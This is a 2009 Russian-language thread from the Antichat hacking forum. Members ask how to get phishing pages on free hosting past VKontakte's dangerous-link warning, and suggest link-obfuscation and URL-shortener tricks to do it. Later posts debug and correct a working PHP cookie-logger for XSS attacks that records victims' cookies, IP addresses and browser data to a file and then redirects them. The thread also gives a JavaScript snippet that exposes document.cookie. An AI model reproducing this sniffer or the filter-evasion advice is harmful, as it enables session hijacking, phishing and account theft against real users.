Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
02.09.2009, 03:01
|
|
Новичок
Регистрация: 09.08.2009
Сообщений: 8
Провел на форуме:
67268
Репутация:
0
|
|
Все бесплатные хостинги не принимаются контактом, то есть делаю фэйк на бесплатном хостинге, жму ссылку через контакт, а там шляпа, типа данная ссылка очень опасна и не дает дальше по ссылке проходу, как с этим бороться кто знает? Иностранные хостинги тоже палятся, есть вариант юзать платные но это не интересно. посоветуйте че делать?
Последний раз редактировалось maritus; 02.09.2009 в 03:45..
|
|
|
02.09.2009, 09:52
|
|
Познающий
Регистрация: 29.08.2009
Сообщений: 66
Провел на форуме:
980207
Репутация:
184
|
|
Сообщение от maritus
Все бесплатные хостинги не принимаются контактом, то есть делаю фэйк на бесплатном хостинге, жму ссылку через контакт, а там шляпа, типа данная ссылка очень опасна и не дает дальше по ссылке проходу, как с этим бороться кто знает? Иностранные хостинги тоже палятся, есть вариант юзать платные но это не интересно. посоветуйте че делать?
Когда в сообщений кому нить посылаешь свой сайт, пиши без хттп и перед ру провел.
чтобы он тупо копирнул ссыль в адрес 
и как раз не будет сообщения о том что ты переходишь на другой сайт
|
|
|
|
03.09.2009, 15:56
|
|
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме:
4532332
Репутация:
1196
|
|
Сообщение от Cristiel
Когда в сообщений кому нить посылаешь свой сайт, пиши без хттп и перед ру провел.
чтобы он тупо копирнул ссыль в адрес
и как раз не будет сообщения о том что ты переходишь на другой сайт можно просто обрезать линк через tinyurl.com, думаю у них не фри хостинг.
|
|
|
|
05.09.2009, 20:02
|
|
Новичок
Регистрация: 24.05.2007
Сообщений: 5
Провел на форуме:
71910
Репутация:
0
|
|
Сообщение от L I G A
можно просто обрезать линк через tinyurl.com, думаю у них не фри хостинг.
Ссылка [ссылка] по которой Вы попытались перейти, является сокращением другой ссылки, созданным при помощи специального сервиса сокращения ссылок tinyurl.com и бла бла. Тут, к сожалению, тоже засада..
нет ли случайно какого нибудь рабочего редиректа для вконтакте?
|
|
|
|
25.09.2009, 23:06
|
|
Постоянный
Регистрация: 13.12.2008
Сообщений: 354
Провел на форуме:
1747641
Репутация:
175
|
|
Спасибо за приятные отзывы, очень рад был стараться.
|
|
|
|
26.09.2009, 02:25
|
|
Moderator - Level 7
Регистрация: 06.02.2009
Сообщений: 195
Провел на форуме:
2485155
Репутация:
719
|
|
Сообщение от Chrome~
Спасибо за приятные отзывы, очень рад был стараться.
Хром, с файлом log.php для xss у меня не заработал этот вариант
PHP код:
<?PHP
$Cookies = UrlDecode(getenv("QUERY_STRING")); // Читаем переменную a из GET-запроса, в которой будут кукисы
$Date = date("d-m-y H:i:s", time()); // Дата и время
$browser = getenv("HTTP_USER_AGENT"); // Информация о браузере
$ref = getenv("HTTP_REFERER"); // Страница, с которой пришли
$ip = getenv("REMOTE_ADDR"); // IP адрес
// Записываем полученные данные
$text = "Date: $Date\nBrowser: $browser\nReferer: $ref\nIP: $ip\nQuery: $query\n\n";
$filelog = fopen("base.php","a+"); // Открываем файл базы
fwrite($filelog,"\n $text \n"); // Записываем
fclose($filelog); // Закрываем
header('Location: http://somesite.ru'); // Переводим жертву на указанный адрес
?>
а когда я убрал лишние команды в $text= то он заработал на отлично. В чем разница? 
PHP код:
<?PHP
$Cookies = UrlDecode(getenv("QUERY_STRING"));
$Date = date("d-m-y H:i:s", time());
$browser = getenv("HTTP_USER_AGENT");
$ref = getenv("HTTP_REFERER");
$ip = getenv("REMOTE_ADDR");
$text = "
$Cookies:
$Date:
$browser:
$ref:
$ip:
$query";
$filelog = fopen("base.php","a+");
fwrite($filelog,"\n $text \n");
fclose($filelog);
header('Location: http://somesite.ru'');
?>
|
|
|
|
26.09.2009, 13:02
|
|
Постоянный
Регистрация: 13.12.2008
Сообщений: 354
Провел на форуме:
1747641
Репутация:
175
|
|
Я эту статью писал действительно очень давно. Но вот спасибо за замечание, потому что я сделал ошибку.
Это полный код данного PHP файла.
PHP код:
<?PHP
$Cookies = UrlDecode(getenv("QUERY_STRING")); // Читаем переменную a из GET-запроса, в которой будут кукисы
$Date = date("d-m-y H:i:s", time()); // Дата и время
$browser = getenv("HTTP_USER_AGENT"); // Информация о браузере
$ref = getenv("HTTP_REFERER"); // Страница, с которой пришли
$ip = getenv("REMOTE_ADDR"); // IP адрес
// Записываем полученные данные
$text = "Date: $Date\nBrowser: $browser\nReferer: $ref\nIP: $ip\nQuery: $query\n\n";
$filelog = fopen("base.php","a+"); // Открываем файл базы
fwrite($filelog,"\n $text \n"); // Записываем
fclose($filelog); // Закрываем
header('Location: http://somesite.ru'); // Переводим жертву на указанный адрес
?>
Вся проблема в этой строчке:
PHP код:
// Записываем полученные данные
$text = "Date: $Date\nBrowser: $browser\nReferer: $ref\nIP: $ip\nQuery: $query\n\n";
Не знаю, почему я записал Query: $query, потому что по идеи должно быть Query: $Cookies.
То есть исправленный вариант выглядит так:
PHP код:
<?PHP
$Cookies = UrlDecode(getenv("QUERY_STRING")); // Читаем переменную a из GET-запроса, в которой будут кукисы
$Date = date("d-m-y H:i:s", time()); // Дата и время
$browser = getenv("HTTP_USER_AGENT"); // Информация о браузере
$ref = getenv("HTTP_REFERER"); // Страница, с которой пришли
$ip = getenv("REMOTE_ADDR"); // IP адрес
// Записываем полученные данные
$text = "\r\n\r\nDate: $Date\r\nBrowser: $browser\r\nReferer: $ref\r\nIP: $ip\r\nQuery: $Cookies\r\n\r\n";
$filelog = fopen("base.php","a+"); // Открываем файл базы
fwrite($filelog,"$text"); // Записываем
fclose($filelog); // Закрываем
header('Location: http://somesite.ru'); // Переводим жертву на указанный адрес
?>
Только что проверил у себя, - все работает. Оффлайн версию статьи сегодня исправлю. |
|
|
|
27.09.2009, 12:32
|
|
Участник форума
Регистрация: 29.05.2008
Сообщений: 181
Провел на форуме:
979048
Репутация:
101
|
|
afftar, javascript:document.cookie работает вроде как только в мозилле. а устойчивая конструкция есть javascript: document.write(document.cookie);
|
|
|
|
27.09.2009, 19:10
|
|
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме:
4532332
Репутация:
1196
|
|
Сообщение от Chrome~
Я эту статью писал действительно очень давно. Но вот спасибо за замечание, потому что я сделал ошибку.
Это полный код данного PHP файла.
PHP код:
<?PHP
$Cookies = UrlDecode(getenv("QUERY_STRING")); // Читаем переменную a из GET-запроса, в которой будут кукисы
$Date = date("d-m-y H:i:s", time()); // Дата и время
$browser = getenv("HTTP_USER_AGENT"); // Информация о браузере
$ref = getenv("HTTP_REFERER"); // Страница, с которой пришли
$ip = getenv("REMOTE_ADDR"); // IP адрес
// Записываем полученные данные
$text = "Date: $Date\nBrowser: $browser\nReferer: $ref\nIP: $ip\nQuery: $query\n\n";
$filelog = fopen("base.php","a+"); // Открываем файл базы
fwrite($filelog,"\n $text \n"); // Записываем
fclose($filelog); // Закрываем
header('Location: http://somesite.ru'); // Переводим жертву на указанный адрес
?>
Вся проблема в этой строчке:
PHP код:
// Записываем полученные данные
$text = "Date: $Date\nBrowser: $browser\nReferer: $ref\nIP: $ip\nQuery: $query\n\n";
Не знаю, почему я записал Query: $query, потому что по идеи должно быть Query: $Cookies.
То есть исправленный вариант выглядит так:
PHP код:
<?PHP
$Cookies = UrlDecode(getenv("QUERY_STRING")); // Читаем переменную a из GET-запроса, в которой будут кукисы
$Date = date("d-m-y H:i:s", time()); // Дата и время
$browser = getenv("HTTP_USER_AGENT"); // Информация о браузере
$ref = getenv("HTTP_REFERER"); // Страница, с которой пришли
$ip = getenv("REMOTE_ADDR"); // IP адрес
// Записываем полученные данные
$text = "\r\n\r\nDate: $Date\r\nBrowser: $browser\r\nReferer: $ref\r\nIP: $ip\r\nQuery: $Cookies\r\n\r\n";
$filelog = fopen("base.php","a+"); // Открываем файл базы
fwrite($filelog,"$text"); // Записываем
fclose($filelog); // Закрываем
header('Location: http://somesite.ru'); // Переводим жертву на указанный адрес
?>
Только что проверил у себя, - все работает. Оффлайн версию статьи сегодня исправлю. сорри мб я не догоняю,но как оно заработало от : перевода строки,возврата каретки,вот и я хз как '(
И на последок - ВСЕГДА проверяй, что принимаешь и что отсылаешь
Имеются ввиду типы переменных, их размерность, наличие/отсутствие.
|
|
|
|
27.09.2009, 19:59
|
|
Постоянный
Регистрация: 13.12.2008
Сообщений: 354
Провел на форуме:
1747641
Репутация:
175
|
|
Сообщение от L I G A
сорри мб я не догоняю,но как оно заработало от : перевода строки,возврата каретки,вот и я хз как '(
Нет. Когда я писал данную статью, у меня было в PHP не очень много опыта. Если не ошибаюсь, то вместо \n в текстах, строках и т. д. лучше писать \r\n.
Ну а сама ошибка вот здесь:
PHP код:
$text = "Date: $Date\nBrowser: $browser\nReferer: $ref\nIP: $ip\nQuery: $query\n\n";
Должно быть не Query: $query, а Query: $Cookies, то есть:
PHP код:
$text = "\r\n\r\nDate: $Date\r\nBrowser: $browser\r\nReferer: $ref\r\nIP: $ip\r\nQuery: $Cookies\r\n\r\n";
Сообщение от L I G A
И на последок - ВСЕГДА проверяй, что принимаешь и что отсылаешь
Имеются ввиду типы переменных, их размерность, наличие/отсутствие.
В данном случае все эти проверки излишние. Но если ты говоришь о реальных проектах, особенно если используется БД, тогда я целиком согласен и поддерживаю тебя.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
